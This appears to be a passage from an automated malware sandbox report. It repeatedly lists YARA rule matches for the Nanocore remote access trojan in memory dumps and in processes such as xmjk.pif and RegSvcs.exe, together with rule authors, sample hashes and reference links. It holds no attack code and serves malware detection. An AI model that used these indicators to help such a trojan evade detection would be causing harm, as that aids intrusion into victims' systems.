        Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001F.00000002.440127421.0000000003E89000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001F.00000002.440034174.0000000002E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
